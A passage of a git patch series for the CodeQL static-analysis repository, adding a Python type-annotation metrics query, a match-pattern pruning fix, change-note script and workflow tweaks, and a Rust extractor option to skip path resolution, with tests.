From 4141b4fb8a245ffac7323036fb16ec6c9e9e315e Mon Sep 17 00:00:00 2001 From: Taus Date: Wed, 8 Jan 2025 15:41:31 +0000 Subject: [PATCH 001/892] Python: Add metrics query for type annotations Adds a query that counts the number of type annotations of various kinds. Intended to be used with something like MRVA to inform our modelling decisions. Currently the query counts the following "interesting" types in addition to the total number of types: - Built-in types (which are less likely to be interesting from a modelling perspective) - Forward declarations (i.e. annotations inside strings) which will require a fair bit of QL machinery to interpret. - Simple types (stuff like `foo` or `foo.bar.baz`) - Optional types (stuff like `Optional[foo]` which from a modelling perspective should likely be treated the same as `foo`) - Complex types (anything that contains more complex type constructions such as instantiations of generic types) --- .../src/Metrics/Internal/TypeAnnotations.ql | 108 ++++++++++++++++++ 1 file changed, 108 insertions(+) create mode 100644 python/ql/src/Metrics/Internal/TypeAnnotations.ql diff --git a/python/ql/src/Metrics/Internal/TypeAnnotations.ql b/python/ql/src/Metrics/Internal/TypeAnnotations.ql new file mode 100644 index 000000000000..891e85084590 --- /dev/null +++ b/python/ql/src/Metrics/Internal/TypeAnnotations.ql @@ -0,0 +1,108 @@ +/** + * @name Type metrics + * @description Counts of various kinds of type annotations in Python code. + * @kind table + * @id py/type-metrics + */ + +import python + +class BuiltinType extends Name { + BuiltinType() { this.getId() in ["int", "float", "str", "bool", "bytes", "None"] } +} + +newtype TAnnotatable = + TAnnotatedFunction(FunctionExpr f) { exists(f.getReturns()) } or + TAnnotatedParameter(Parameter p) { exists(p.getAnnotation()) } or + TAnnotatedAssignment(AnnAssign a) { exists(a.getAnnotation()) } + +abstract class Annotatable extends TAnnotatable { + string toString() { result = "Annotatable" } + + abstract Expr getAnnotation(); +} + +class AnnotatedFunction extends TAnnotatedFunction, Annotatable { + FunctionExpr function; + + AnnotatedFunction() { this = TAnnotatedFunction(function) } + + override Expr getAnnotation() { result = function.getReturns() } +} + +class AnnotatedParameter extends TAnnotatedParameter, Annotatable { + Parameter parameter; + + AnnotatedParameter() { this = TAnnotatedParameter(parameter) } + + override Expr getAnnotation() { result = parameter.getAnnotation() } +} + +class AnnotatedAssignment extends TAnnotatedAssignment, Annotatable { + AnnAssign assignment; + + AnnotatedAssignment() { this = TAnnotatedAssignment(assignment) } + + override Expr getAnnotation() { result = assignment.getAnnotation() } +} + +/** Holds if `e` is a forward declaration of a type. */ +predicate is_forward_declaration(Expr e) { e instanceof StringLiteral } + +/** Holds if `e` is a type that may be difficult to analyze. */ +predicate is_complex_type(Expr e) { + e instanceof Subscript and not is_optional_type(e) + or + e instanceof Tuple + or + e instanceof List +} + +/** Holds if `e` is a type of the form `Optional[...]`. */ +predicate is_optional_type(Subscript e) { e.getObject().(Name).getId() = "Optional" } + +/** Holds if `e` is a simple type, that is either an identifier (excluding built-in types) or an attribute of a simple type. */ +predicate is_simple_type(Expr e) { + e instanceof Name and not e instanceof BuiltinType + or + is_simple_type(e.(Attribute).getObject()) +} + +/** Holds if `e` is a built-in type. */ +predicate is_builtin_type(Expr e) { e instanceof BuiltinType } + +predicate type_count( + string kind, int total, int built_in_count, int forward_declaration_count, int simple_type_count, + int complex_type_count, int optional_type_count +) { + kind = "Parameter annotation" and + total = count(AnnotatedParameter p) and + built_in_count = count(AnnotatedParameter p | is_builtin_type(p.getAnnotation())) and + forward_declaration_count = + count(AnnotatedParameter p | is_forward_declaration(p.getAnnotation())) and + simple_type_count = count(AnnotatedParameter p | is_simple_type(p.getAnnotation())) and + complex_type_count = count(AnnotatedParameter p | is_complex_type(p.getAnnotation())) and + optional_type_count = count(AnnotatedParameter p | is_optional_type(p.getAnnotation())) + or + kind = "Return type annotation" and + total = count(AnnotatedFunction f) and + built_in_count = count(AnnotatedFunction f | is_builtin_type(f.getAnnotation())) and + forward_declaration_count = count(AnnotatedFunction f | is_forward_declaration(f.getAnnotation())) and + simple_type_count = count(AnnotatedFunction f | is_simple_type(f.getAnnotation())) and + complex_type_count = count(AnnotatedFunction f | is_complex_type(f.getAnnotation())) and + optional_type_count = count(AnnotatedFunction f | is_optional_type(f.getAnnotation())) + or + kind = "Annotated assignment" and + total = count(AnnotatedAssignment a) and + built_in_count = count(AnnotatedAssignment a | is_builtin_type(a.getAnnotation())) and + forward_declaration_count = + count(AnnotatedAssignment a | is_forward_declaration(a.getAnnotation())) and + simple_type_count = count(AnnotatedAssignment a | is_simple_type(a.getAnnotation())) and + complex_type_count = count(AnnotatedAssignment a | is_complex_type(a.getAnnotation())) and + optional_type_count = count(AnnotatedAssignment a | is_optional_type(a.getAnnotation())) +} + +from + string message, int total, int built_in, int forward_decl, int simple, int complex, int optional +where type_count(message, total, built_in, forward_decl, simple, complex, optional) +select message, total, built_in, forward_decl, simple, complex, optional From 918c05c538bb139f22e6a3f1f89aaef5bd314d0f Mon Sep 17 00:00:00 2001 From: Taus Date: Tue, 11 Feb 2025 12:58:52 +0000 Subject: [PATCH 002/892] Python: Don't prune any `MatchLiteralPattern`s Extends the mechanism introduced in https://github.com/github/codeql/pull/18030 to behave the same for _all_ `MatchLiteralPattern`s, not just the ones that happen to be the constant `True` or `False`. Co-authored-by: yoff --- python/extractor/semmle/python/passes/pruner.py | 6 +++--- .../Statements/unreachable/UnreachableCode.expected | 3 --- 2 files changed, 3 insertions(+), 6 deletions(-) diff --git a/python/extractor/semmle/python/passes/pruner.py b/python/extractor/semmle/python/passes/pruner.py index fe3b03d453cd..5b69ec25bf3d 100644 --- a/python/extractor/semmle/python/passes/pruner.py +++ b/python/extractor/semmle/python/passes/pruner.py @@ -203,7 +203,8 @@ def __init__(self): self.nodes = set() def visit_MatchLiteralPattern(self, node): - # MatchLiteralPatterns _look_ like boolean tests, but are not. + # MatchLiteralPatterns _look_ like boolean tests in that they have both a true ("matched") + # and false ("didn't match") successor, but are not. # Thus, without this check, we would interpret # # match x: @@ -212,8 +213,7 @@ def visit_MatchLiteralPattern(self, node): # # (and similarly for True) as if it was a boolean test. This would cause the true edge # (leading to pass) to be pruned later on. - if isinstance(node.literal, ast.Name) and node.literal.id in ('True', 'False'): - self.nodes.add(node.literal) + self.nodes.add(node.literal) class NonlocalVisitor(ASTVisitor): def __init__(self): diff --git a/python/ql/test/query-tests/Statements/unreachable/UnreachableCode.expected b/python/ql/test/query-tests/Statements/unreachable/UnreachableCode.expected index f5e74fab8d49..2417041f472d 100644 --- a/python/ql/test/query-tests/Statements/unreachable/UnreachableCode.expected +++ b/python/ql/test/query-tests/Statements/unreachable/UnreachableCode.expected @@ -4,6 +4,3 @@ | test.py:21:5:21:38 | For | This statement is unreachable. | | test.py:28:9:28:21 | ExprStmt | This statement is unreachable. | | test.py:84:5:84:21 | ExceptStmt | This statement is unreachable. | -| test.py:158:9:159:16 | Case | This statement is unreachable. | -| test.py:162:13:162:16 | Pass | This statement is unreachable. | -| test.py:167:13:167:16 | Pass | This statement is unreachable. | From a69e3f523666f4dffa06f6c845ca68364f320e76 Mon Sep 17 00:00:00 2001 From: Taus Date: Tue, 11 Feb 2025 13:02:09 +0000 Subject: [PATCH 003/892] Python: Add change note Co-authored-by: yoff --- .../lib/change-notes/2025-02-11-fix-match-literal-pruning.md | 5 +++++ 1 file changed, 5 insertions(+) create mode 100644 python/ql/lib/change-notes/2025-02-11-fix-match-literal-pruning.md diff --git a/python/ql/lib/change-notes/2025-02-11-fix-match-literal-pruning.md b/python/ql/lib/change-notes/2025-02-11-fix-match-literal-pruning.md new file mode 100644 index 000000000000..79b2d4b11fec --- /dev/null +++ b/python/ql/lib/change-notes/2025-02-11-fix-match-literal-pruning.md @@ -0,0 +1,5 @@ +--- +category: fix +--- + +- `MatchLiteralPattern`s are now never pruned, as this could lead to code being wrongly identified as unreachable. From 4c3a2cd1112f958a00c402cb9cb8024044d29c68 Mon Sep 17 00:00:00 2001 From: Simon Friis Vindum Date: Tue, 11 Feb 2025 14:04:46 +0100 Subject: [PATCH 004/892] Change note creation script uses EDITOR environment variable Changes the script for creating change notes to read the EDITOR environment variable, and use the editor specified therein. This makes the script more convenient when used from a terminal. The VSCode task is updated to the set EDITOR to `code -r` which preserves the current behavior. --- .vscode/tasks.json | 10 ++++++++++ misc/scripts/create-change-note.py | 8 +++++--- 2 files changed, 15 insertions(+), 3 deletions(-) diff --git a/.vscode/tasks.json b/.vscode/tasks.json index 5e4b9397d26d..5786439f38fb 100644 --- a/.vscode/tasks.json +++ b/.vscode/tasks.json @@ -50,6 +50,11 @@ "${input:name}", "${input:categoryQuery}" ], + "options": { + "env": { + "EDITOR": "code -r", + } + }, "presentation": { "reveal": "never", "close": true @@ -67,6 +72,11 @@ "${input:name}", "${input:categoryLibrary}" ], + "options": { + "env": { + "EDITOR": "code -r" + } + }, "presentation": { "reveal": "never", "close": true diff --git a/misc/scripts/create-change-note.py b/misc/scripts/create-change-note.py index 548fa4e87fb0..eb7eb95e7b87 100755 --- a/misc/scripts/create-change-note.py +++ b/misc/scripts/create-change-note.py @@ -1,6 +1,7 @@ #!/usr/bin/env python3 -# Creates a change note and opens it in VSCode for editing. +# Creates a change note and opens it in $EDITOR (or VSCode if the environment +# variable is not set) for editing. # Expects to receive the following arguments: # - What language the change note is for @@ -51,5 +52,6 @@ with open(change_note_file, "w") as f: f.write(change_note) -# Open the change note file in VSCode, reusing the existing window if possible -os.system(f"code -r {change_note_file}") +editor = os.environ.get('EDITOR', 'code') + +os.system(f"{editor} {change_note_file}") From 9bd116fcf81e7d3655106327d600e6411edf136f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=93scar=20San=20Jos=C3=A9?= Date: Tue, 11 Feb 2025 16:02:40 +0100 Subject: [PATCH 005/892] Add actions to codeql analysis workflow --- .github/workflows/codeql-analysis.yml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/.github/workflows/codeql-analysis.yml b/.github/workflows/codeql-analysis.yml index d571d961e677..f6226f2182dd 100644 --- a/.github/workflows/codeql-analysis.yml +++ b/.github/workflows/codeql-analysis.yml @@ -18,6 +18,10 @@ on: jobs: CodeQL-Build: + strategy: + fail-fast: false + matrix: + language: ['actions', 'csharp'] runs-on: ubuntu-latest @@ -38,9 +42,7 @@ jobs: # Initializes the CodeQL tools for scanning. - name: Initialize CodeQL uses: github/codeql-action/init@main - # Override language selection by uncommenting this and choosing your languages with: - languages: csharp config-file: ./.github/codeql/codeql-config.yml # Autobuild attempts to build any compiled languages (C/C++, C#, or Java). From 3611673eec702a80e60581ba35824e7255664125 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=93scar=20San=20Jos=C3=A9?= Date: Wed, 12 Feb 2025 12:34:02 +0100 Subject: [PATCH 006/892] Fix param name in CodeQL workflow configuration --- .github/workflows/codeql-analysis.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/codeql-analysis.yml b/.github/workflows/codeql-analysis.yml index f6226f2182dd..8c4a7b83a73b 100644 --- a/.github/workflows/codeql-analysis.yml +++ b/.github/workflows/codeql-analysis.yml @@ -21,7 +21,7 @@ jobs: strategy: fail-fast: false matrix: - language: ['actions', 'csharp'] + languages: ['actions', 'csharp'] runs-on: ubuntu-latest From efd9523079562e325366de6e237359fd2f2390fc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=93scar=20San=20Jos=C3=A9?= Date: Wed, 12 Feb 2025 12:59:48 +0100 Subject: [PATCH 007/892] Fix typo in CodeQL workflow configuration --- .github/workflows/codeql-analysis.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/.github/workflows/codeql-analysis.yml b/.github/workflows/codeql-analysis.yml index 8c4a7b83a73b..ba384245e0eb 100644 --- a/.github/workflows/codeql-analysis.yml +++ b/.github/workflows/codeql-analysis.yml @@ -21,7 +21,7 @@ jobs: strategy: fail-fast: false matrix: - languages: ['actions', 'csharp'] + language: ['actions', 'csharp'] runs-on: ubuntu-latest @@ -43,6 +43,7 @@ jobs: - name: Initialize CodeQL uses: github/codeql-action/init@main with: + languages: ${{ matrix.language }} config-file: ./.github/codeql/codeql-config.yml # Autobuild attempts to build any compiled languages (C/C++, C#, or Java). From 98ff40646210e1ec67dbe5ba2c4e7f69090aa4e3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=93scar=20San=20Jos=C3=A9?= Date: Wed, 12 Feb 2025 16:42:08 +0100 Subject: [PATCH 008/892] Add codeql exception to integration-tests folder --- .github/codeql/codeql-config.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/codeql/codeql-config.yml b/.github/codeql/codeql-config.yml index 9740cf65147e..3548a42cbdec 100644 --- a/.github/codeql/codeql-config.yml +++ b/.github/codeql/codeql-config.yml @@ -8,5 +8,6 @@ paths-ignore: - '/java/' - '/python/' - '/javascript/ql/test' + - '/javascript/ql/integration-tests' - '/javascript/extractor/tests' - '/rust/ql' From c1df8d0e1382076b67a74ebc900c276a19b86caa Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Wed, 19 Feb 2025 09:44:09 +0100 Subject: [PATCH 009/892] Rust: add flag to turn off extractor path resolution --- rust/codeql-extractor.yml | 4 ++ rust/extractor/src/config.rs | 1 + rust/extractor/src/main.rs | 22 +++++-- rust/extractor/src/translate.rs | 2 +- rust/extractor/src/translate/base.rs | 21 ++++++ .../canonical_path/disabled/anonymous.rs | 39 +++++++++++ .../disabled/canonical_paths.expected | 66 +++++++++++++++++++ .../disabled/canonical_paths.qlref | 1 + .../canonical_path/disabled/options.yml | 1 + .../canonical_path/disabled/regular.rs | 66 +++++++++++++++++++ 10 files changed, 218 insertions(+), 5 deletions(-) create mode 100644 rust/ql/test/extractor-tests/canonical_path/disabled/anonymous.rs create mode 100644 rust/ql/test/extractor-tests/canonical_path/disabled/canonical_paths.expected create mode 100644 rust/ql/test/extractor-tests/canonical_path/disabled/canonical_paths.qlref create mode 100644 rust/ql/test/extractor-tests/canonical_path/disabled/options.yml create mode 100644 rust/ql/test/extractor-tests/canonical_path/disabled/regular.rs diff --git a/rust/codeql-extractor.yml b/rust/codeql-extractor.yml index 27f423134a67..1c73a070e587 100644 --- a/rust/codeql-extractor.yml +++ b/rust/codeql-extractor.yml @@ -78,3 +78,7 @@ options: Collect flame graph data using the `tracing-flame` crate. To render a flame graph or chart, run the `inferno-flamegraph` command. See also: https://crates.io/crates/tracing-flame type: string + skip_path_resolution: + title: Skip path resolution + description: > + Skip path resolution. This is experimental, while we move path resolution from the extractor to the QL library. diff --git a/rust/extractor/src/config.rs b/rust/extractor/src/config.rs index 82568b64553f..aec443f6d871 100644 --- a/rust/extractor/src/config.rs +++ b/rust/extractor/src/config.rs @@ -57,6 +57,7 @@ pub struct Config { pub qltest: bool, pub qltest_cargo_check: bool, pub qltest_dependencies: Vec, + pub skip_path_resolution: bool, } impl Config { diff --git a/rust/extractor/src/main.rs b/rust/extractor/src/main.rs index 04aaf23c652e..9d70956ab189 100644 --- a/rust/extractor/src/main.rs +++ b/rust/extractor/src/main.rs @@ -1,5 +1,6 @@ use crate::diagnostics::{emit_extraction_diagnostics, ExtractionStep}; use crate::rust_analyzer::path_to_file_id; +use crate::translate::ResolvePaths; use crate::trap::TrapId; use anyhow::Context; use archive::Archiver; @@ -43,7 +44,7 @@ impl<'a> Extractor<'a> { } } - fn extract(&mut self, rust_analyzer: &rust_analyzer::RustAnalyzer, file: &std::path::Path) { + fn extract(&mut self, rust_analyzer: &RustAnalyzer, file: &Path, resolve_paths: ResolvePaths) { self.archiver.archive(file); let before_parse = Instant::now(); @@ -66,6 +67,7 @@ impl<'a> Extractor<'a> { label, line_index, semantics_info.as_ref().ok(), + resolve_paths, ); for err in errors { @@ -102,12 +104,17 @@ impl<'a> Extractor<'a> { file: &Path, semantics: &Semantics<'_, RootDatabase>, vfs: &Vfs, + resolve_paths: ResolvePaths, ) { - self.extract(&RustAnalyzer::new(vfs, semantics), file); + self.extract(&RustAnalyzer::new(vfs, semantics), file, resolve_paths); } pub fn extract_without_semantics(&mut self, file: &Path, reason: &str) { - self.extract(&RustAnalyzer::WithoutSemantics { reason }, file); + self.extract( + &RustAnalyzer::WithoutSemantics { reason }, + file, + ResolvePaths::No, + ); } pub fn load_manifest( @@ -236,12 +243,19 @@ fn main() -> anyhow::Result<()> { extractor.extract_without_semantics(file, "no manifest found"); } let cargo_config = cfg.to_cargo_config(&cwd()?); + let resolve_paths = if cfg.skip_path_resolution { + ResolvePaths::No + } else { + ResolvePaths::Yes + }; for (manifest, files) in map.values().filter(|(_, files)| !files.is_empty()) { if let Some((ref db, ref vfs)) = extractor.load_manifest(manifest, &cargo_config) { let semantics = Semantics::new(db); for file in files { match extractor.load_source(file, &semantics, vfs) { - Ok(()) => extractor.extract_with_semantics(file, &semantics, vfs), + Ok(()) => { + extractor.extract_with_semantics(file, &semantics, vfs, resolve_paths) + } Err(reason) => extractor.extract_without_semantics(file, &reason), }; } diff --git a/rust/extractor/src/translate.rs b/rust/extractor/src/translate.rs index 4e9cda3e2aa1..c74652628f8c 100644 --- a/rust/extractor/src/translate.rs +++ b/rust/extractor/src/translate.rs @@ -2,4 +2,4 @@ mod base; mod generated; mod mappings; -pub use base::Translator; +pub use base::{ResolvePaths, Translator}; diff --git a/rust/extractor/src/translate/base.rs b/rust/extractor/src/translate/base.rs index fe13de6498e2..19c86374a455 100644 --- a/rust/extractor/src/translate/base.rs +++ b/rust/extractor/src/translate/base.rs @@ -83,6 +83,12 @@ macro_rules! dispatch_to_tracing { }; } +#[derive(Copy, Clone, PartialEq, Eq)] +pub enum ResolvePaths { + Yes, + No, +} + pub struct Translator<'a> { pub trap: TrapFile, path: &'a str, @@ -90,6 +96,7 @@ pub struct Translator<'a> { line_index: LineIndex, file_id: Option, pub semantics: Option<&'a Semantics<'a, RootDatabase>>, + resolve_paths: ResolvePaths, } const UNKNOWN_LOCATION: (LineCol, LineCol) = @@ -102,6 +109,7 @@ impl<'a> Translator<'a> { label: Label, line_index: LineIndex, semantic_info: Option<&FileSemanticInformation<'a>>, + resolve_paths: ResolvePaths, ) -> Translator<'a> { Translator { trap, @@ -110,6 +118,7 @@ impl<'a> Translator<'a> { line_index, file_id: semantic_info.map(|i| i.file_id), semantics: semantic_info.map(|i| i.semantics), + resolve_paths, } } fn location(&self, range: TextRange) -> Option<(LineCol, LineCol)> { @@ -497,6 +506,9 @@ impl<'a> Translator<'a> { item: &T, label: Label, ) { + if self.resolve_paths == ResolvePaths::No { + return; + } (|| { let sema = self.semantics.as_ref()?; let def = T::Hir::try_from_source(item, sema)?; @@ -517,6 +529,9 @@ impl<'a> Translator<'a> { item: &ast::Variant, label: Label, ) { + if self.resolve_paths == ResolvePaths::No { + return; + } (|| { let sema = self.semantics.as_ref()?; let def = sema.to_enum_variant_def(item)?; @@ -537,6 +552,9 @@ impl<'a> Translator<'a> { item: &impl PathAst, label: Label, ) { + if self.resolve_paths == ResolvePaths::No { + return; + } (|| { let path = item.path()?; let sema = self.semantics.as_ref()?; @@ -557,6 +575,9 @@ impl<'a> Translator<'a> { item: &ast::MethodCallExpr, label: Label, ) { + if self.resolve_paths == ResolvePaths::No { + return; + } (|| { let sema = self.semantics.as_ref()?; let resolved = sema.resolve_method_call_fallback(item)?; diff --git a/rust/ql/test/extractor-tests/canonical_path/disabled/anonymous.rs b/rust/ql/test/extractor-tests/canonical_path/disabled/anonymous.rs new file mode 100644 index 000000000000..d26ea6b992d7 --- /dev/null +++ b/rust/ql/test/extractor-tests/canonical_path/disabled/anonymous.rs @@ -0,0 +1,39 @@ +// would prefer to write `include!("../anonymous.rs");` +// but it seems `include!` does not work in rust-analyzer/our extractor + +use super::regular::Trait; + +fn canonicals() { + struct OtherStruct; + + trait OtherTrait { + fn g(&self); + } + + impl OtherTrait for OtherStruct { + fn g(&self) {} + } + + impl OtherTrait for crate::regular::Struct { + fn g(&self) {} + } + + impl crate::regular::Trait for OtherStruct { + fn f(&self) {} + } + + fn nested() { + struct OtherStruct; + } + + fn usage() { + let s = OtherStruct {}; + s.f(); + s.g(); + nested(); + } +} + +fn other() { + struct OtherStruct; +} diff --git a/rust/ql/test/extractor-tests/canonical_path/disabled/canonical_paths.expected b/rust/ql/test/extractor-tests/canonical_path/disabled/canonical_paths.expected new file mode 100644 index 000000000000..6a19610d76ff --- /dev/null +++ b/rust/ql/test/extractor-tests/canonical_path/disabled/canonical_paths.expected @@ -0,0 +1,66 @@ +canonicalPaths +| anonymous.rs:4:1:4:26 | Use | None | None | +| anonymous.rs:6:1:35:1 | fn canonicals | None | None | +| anonymous.rs:7:5:7:23 | struct OtherStruct | None | None | +| anonymous.rs:9:5:11:5 | trait OtherTrait | None | None | +| anonymous.rs:10:9:10:20 | fn g | None | None | +| anonymous.rs:13:5:15:5 | impl OtherTrait for OtherStruct { ... } | None | None | +| anonymous.rs:14:9:14:22 | fn g | None | None | +| anonymous.rs:17:5:19:5 | impl OtherTrait for ...::Struct { ... } | None | None | +| anonymous.rs:18:9:18:22 | fn g | None | None | +| anonymous.rs:21:5:23:5 | impl ...::Trait for OtherStruct { ... } | None | None | +| anonymous.rs:22:9:22:22 | fn f | None | None | +| anonymous.rs:25:5:27:5 | fn nested | None | None | +| anonymous.rs:26:9:26:27 | struct OtherStruct | None | None | +| anonymous.rs:29:5:34:5 | fn usage | None | None | +| anonymous.rs:37:1:39:1 | fn other | None | None | +| anonymous.rs:38:5:38:23 | struct OtherStruct | None | None | +| lib.rs:1:1:1:14 | mod anonymous | None | None | +| lib.rs:2:1:2:12 | mod regular | None | None | +| regular.rs:4:1:5:18 | struct Struct | None | None | +| regular.rs:7:1:9:1 | trait Trait | None | None | +| regular.rs:8:5:8:16 | fn f | None | None | +| regular.rs:11:1:13:1 | impl Trait for Struct { ... } | None | None | +| regular.rs:12:5:12:18 | fn f | None | None | +| regular.rs:15:1:17:1 | impl Struct { ... } | None | None | +| regular.rs:16:5:16:18 | fn g | None | None | +| regular.rs:19:1:21:1 | trait TraitWithBlanketImpl | None | None | +| regular.rs:20:5:20:16 | fn h | None | None | +| regular.rs:23:1:25:1 | impl TraitWithBlanketImpl for T { ... } | None | None | +| regular.rs:24:5:24:18 | fn h | None | None | +| regular.rs:27:1:27:12 | fn free | None | None | +| regular.rs:29:1:35:1 | fn usage | None | None | +| regular.rs:37:1:41:1 | enum MyEnum | None | None | +| regular.rs:43:1:49:1 | fn enum_qualified_usage | None | None | +| regular.rs:51:1:58:1 | fn enum_unqualified_usage | None | None | +| regular.rs:54:5:54:18 | Use | None | None | +| regular.rs:60:1:66:1 | fn enum_match | None | None | +resolvedPaths +| anonymous.rs:30:17:30:30 | OtherStruct {...} | None | None | +| anonymous.rs:31:9:31:9 | s | None | None | +| anonymous.rs:31:9:31:13 | s.f(...) | None | None | +| anonymous.rs:32:9:32:9 | s | None | None | +| anonymous.rs:32:9:32:13 | s.g(...) | None | None | +| anonymous.rs:33:9:33:14 | nested | None | None | +| regular.rs:30:13:30:21 | Struct {...} | None | None | +| regular.rs:31:5:31:5 | s | None | None | +| regular.rs:31:5:31:9 | s.f(...) | None | None | +| regular.rs:32:5:32:5 | s | None | None | +| regular.rs:32:5:32:9 | s.g(...) | None | None | +| regular.rs:33:5:33:5 | s | None | None | +| regular.rs:33:5:33:9 | s.h(...) | None | None | +| regular.rs:34:5:34:8 | free | None | None | +| regular.rs:44:9:44:26 | ...::None::<...> | None | None | +| regular.rs:45:9:45:20 | ...::Some | None | None | +| regular.rs:46:9:46:24 | ...::Variant1 | None | None | +| regular.rs:47:9:47:24 | ...::Variant2 | None | None | +| regular.rs:48:9:48:33 | ...::Variant3 {...} | None | None | +| regular.rs:52:9:52:18 | None::<...> | None | None | +| regular.rs:53:9:53:12 | Some | None | None | +| regular.rs:55:9:55:16 | Variant1 | None | None | +| regular.rs:56:9:56:16 | Variant2 | None | None | +| regular.rs:57:9:57:25 | Variant3 {...} | None | None | +| regular.rs:61:11:61:11 | e | None | None | +| regular.rs:62:9:62:24 | ...::Variant1 | None | None | +| regular.rs:63:9:63:27 | ...::Variant2(...) | None | None | +| regular.rs:64:9:64:31 | ...::Variant3 {...} | None | None | diff --git a/rust/ql/test/extractor-tests/canonical_path/disabled/canonical_paths.qlref b/rust/ql/test/extractor-tests/canonical_path/disabled/canonical_paths.qlref new file mode 100644 index 000000000000..f40a74f5aeda --- /dev/null +++ b/rust/ql/test/extractor-tests/canonical_path/disabled/canonical_paths.qlref @@ -0,0 +1 @@ +extractor-tests/canonical_path/canonical_paths.ql diff --git a/rust/ql/test/extractor-tests/canonical_path/disabled/options.yml b/rust/ql/test/extractor-tests/canonical_path/disabled/options.yml new file mode 100644 index 000000000000..baee4ba5afe9 --- /dev/null +++ b/rust/ql/test/extractor-tests/canonical_path/disabled/options.yml @@ -0,0 +1 @@ +skip_path_resolution: true diff --git a/rust/ql/test/extractor-tests/canonical_path/disabled/regular.rs b/rust/ql/test/extractor-tests/canonical_path/disabled/regular.rs new file mode 100644 index 000000000000..44483645485a --- /dev/null +++ b/rust/ql/test/extractor-tests/canonical_path/disabled/regular.rs @@ -0,0 +1,66 @@ +// would prefer to write `include!("../regular.rs");` +// but it seems `include!` does not work in rust-analyzer/our extractor + +#[derive(Eq, PartialEq)] +pub struct Struct; + +pub trait Trait { + fn f(&self); +} + +impl Trait for Struct { + fn f(&self) {} +} + +impl Struct { + fn g(&self) {} +} + +trait TraitWithBlanketImpl { + fn h(&self); +} + +impl TraitWithBlanketImpl for T { + fn h(&self) {} +} + +fn free() {} + +fn usage() { + let s = Struct {}; + s.f(); + s.g(); + s.h(); + free(); +} + +enum MyEnum { + Variant1, + Variant2(usize), + Variant3 { x: usize }, +} + +fn enum_qualified_usage() { + _ = Option::None::<()>; + _ = Option::Some(0); + _ = MyEnum::Variant1; + _ = MyEnum::Variant2(0); + _ = MyEnum::Variant3 { x: 1 }; +} + +fn enum_unqualified_usage() { + _ = None::<()>; + _ = Some(0); + use MyEnum::*; + _ = Variant1; + _ = Variant2(0); + _ = Variant3 { x: 1 }; +} + +fn enum_match(e: MyEnum) { + match e { + MyEnum::Variant1 => {} + MyEnum::Variant2(_) => {} + MyEnum::Variant3 { .. } => {} + } +} From 9b6f0da1c19f84236acb72ebcc43d4f7bb3ff05c Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Wed, 19 Feb 2025 10:37:52 +0100 Subject: [PATCH 010/892] Rust: move nested ql test out --- .../disabled => canonical_path_disabled}/anonymous.rs | 4 ++-- .../canonical_paths.expected | 0 .../canonical_paths.qlref | 0 .../disabled => canonical_path_disabled}/options.yml | 0 .../disabled => canonical_path_disabled}/regular.rs | 4 ++-- 5 files changed, 4 insertions(+), 4 deletions(-) rename rust/ql/test/extractor-tests/{canonical_path/disabled => canonical_path_disabled}/anonymous.rs (81%) rename rust/ql/test/extractor-tests/{canonical_path/disabled => canonical_path_disabled}/canonical_paths.expected (100%) rename rust/ql/test/extractor-tests/{canonical_path/disabled => canonical_path_disabled}/canonical_paths.qlref (100%) rename rust/ql/test/extractor-tests/{canonical_path/disabled => canonical_path_disabled}/options.yml (100%) rename rust/ql/test/extractor-tests/{canonical_path/disabled => canonical_path_disabled}/regular.rs (88%) diff --git a/rust/ql/test/extractor-tests/canonical_path/disabled/anonymous.rs b/rust/ql/test/extractor-tests/canonical_path_disabled/anonymous.rs similarity index 81% rename from rust/ql/test/extractor-tests/canonical_path/disabled/anonymous.rs rename to rust/ql/test/extractor-tests/canonical_path_disabled/anonymous.rs index d26ea6b992d7..a5a6abd136cf 100644 --- a/rust/ql/test/extractor-tests/canonical_path/disabled/anonymous.rs +++ b/rust/ql/test/extractor-tests/canonical_path_disabled/anonymous.rs @@ -1,5 +1,5 @@ -// would prefer to write `include!("../anonymous.rs");` -// but it seems `include!` does not work in rust-analyzer/our extractor +// would prefer to write `include!("../canonical_paths/anonymous.rs");` +// but `include!` does not work with out-of-dir files use super::regular::Trait; diff --git a/rust/ql/test/extractor-tests/canonical_path/disabled/canonical_paths.expected b/rust/ql/test/extractor-tests/canonical_path_disabled/canonical_paths.expected similarity index 100% rename from rust/ql/test/extractor-tests/canonical_path/disabled/canonical_paths.expected rename to rust/ql/test/extractor-tests/canonical_path_disabled/canonical_paths.expected diff --git a/rust/ql/test/extractor-tests/canonical_path/disabled/canonical_paths.qlref b/rust/ql/test/extractor-tests/canonical_path_disabled/canonical_paths.qlref similarity index 100% rename from rust/ql/test/extractor-tests/canonical_path/disabled/canonical_paths.qlref rename to rust/ql/test/extractor-tests/canonical_path_disabled/canonical_paths.qlref diff --git a/rust/ql/test/extractor-tests/canonical_path/disabled/options.yml b/rust/ql/test/extractor-tests/canonical_path_disabled/options.yml similarity index 100% rename from rust/ql/test/extractor-tests/canonical_path/disabled/options.yml rename to rust/ql/test/extractor-tests/canonical_path_disabled/options.yml diff --git a/rust/ql/test/extractor-tests/canonical_path/disabled/regular.rs b/rust/ql/test/extractor-tests/canonical_path_disabled/regular.rs similarity index 88% rename from rust/ql/test/extractor-tests/canonical_path/disabled/regular.rs rename to rust/ql/test/extractor-tests/canonical_path_disabled/regular.rs index 44483645485a..b958e0c02dad 100644 --- a/rust/ql/test/extractor-tests/canonical_path/disabled/regular.rs +++ b/rust/ql/test/extractor-tests/canonical_path_disabled/regular.rs @@ -1,5 +1,5 @@ -// would prefer to write `include!("../regular.rs");` -// but it seems `include!` does not work in rust-analyzer/our extractor +// would prefer to write `include!("../canonical_path/regular.rs"); +// but `include!` does not work with out-of-dir files #[derive(Eq, PartialEq)] pub struct Struct; From 2ce5920c5e9b387410358b23d4f70b0d023f4535 Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Sun, 16 Feb 2025 12:10:36 -0500 Subject: [PATCH 011/892] Java: copy out of experimental --- .../CWE/CWE-016/SpringBootActuators.java | 22 +++ 